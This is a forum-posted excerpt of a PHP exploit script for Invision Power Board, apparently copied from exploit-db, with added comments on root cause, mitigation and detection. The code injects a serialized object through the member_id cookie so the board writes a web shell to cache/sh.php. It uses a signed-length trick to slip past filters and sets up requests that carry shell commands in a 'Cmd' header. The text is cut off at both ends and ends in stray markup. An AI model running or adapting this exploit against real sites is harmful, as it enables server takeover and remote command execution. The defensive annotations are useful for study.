
27.11.2012, 18:03
[B]Invision Power Board \n";
print"\nExample....: php$argv[0]localhost /";
print"\nExample....: php$argv[0]localhost /ipb/\n";
die();
}
# Takes the target host and base path from the command line, requests the
# board's index page, and captures the text between "Cookie: " and a later
# "session" in the response. The prefix is left empty when nothing matches.
# http_send() is defined outside this excerpt; presumably it returns the raw
# HTTP response as a string (confirm against the full listing).
list($host,$path) = array($argv[1],$argv[2]);
$packet="GET{$path}index.php HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Connection: close\r\n\r\n";
# The captured prefix is reused further down to name the member_id cookie.
$_prefix=preg_match('/Cookie: (.+)session/',http_send($host,$packet),$m) ?$m[1] :'';
# Local declaration that reuses the class name and the `obj` array layout
# found in the serialized string built below. Nothing in this excerpt
# instantiates it; the payload is written out as a literal instead.
# NOTE(review): the name suggests it mirrors a database-driver class on the
# board whose debug-log settings live in `obj`. That cannot be verified from this page.
classdb_driver_mysql
{
public$obj= array('use_debug_log'=>1,'debug_log'=>'cache/sh.php');
}
# Sends a serialized PHP object in the "<prefix>member_id" cookie, then builds
# a request for cache/sh.php that carries a custom "Cmd" header.
#
# Defender notes:
# - Root cause (presumed, the server side is not shown here): the board hands
#   a client-controlled cookie value to unserialize(), so the client chooses
#   the class and the property values of the resulting object.
# - Mitigation: never unserialize request data. Use json_decode() for
#   structured cookies, or at minimum pass ['allowed_classes' => false] to
#   unserialize() on PHP 7+. Keep cache/ non-executable by the web server.
# - Detection: a member_id cookie containing url-encoded serialized notation
#   ("O:" / "a:" followed by a length), a new .php file under cache/, and
#   requests to that file carrying a non-standard "Cmd" header.
# Super bypass by @i0n1c
# NOTE(review): the credit above presumably refers to the signed length in
# "O:+15:", a form that a pattern-based filter for serialized objects may not
# anticipate. Filtering serialized input does not replace avoiding
# deserialization of it.
$payload=urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2 :{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"c ache/sh.php";}}}');
# Empty as shown on this page.
$phpcode='';
$packet="GET{$path}index.php?{$phpcode}HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Cookie:{$_prefix}member_id={$payload}\r\n";
$packet.="Connection: close\r\n\r\n";
http_send($host,$packet);
# Template for the follow-up request. The code that fills in "%s" and sends it
# is cut off on this page.
$packet="GET{$path}cache/sh.php HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Cmd: %s\r\n";
$packet.="Connection: close\r\n\r\n";
if (preg_match('/
[/COLOR]
[/PHP]
(c) exploit-db.com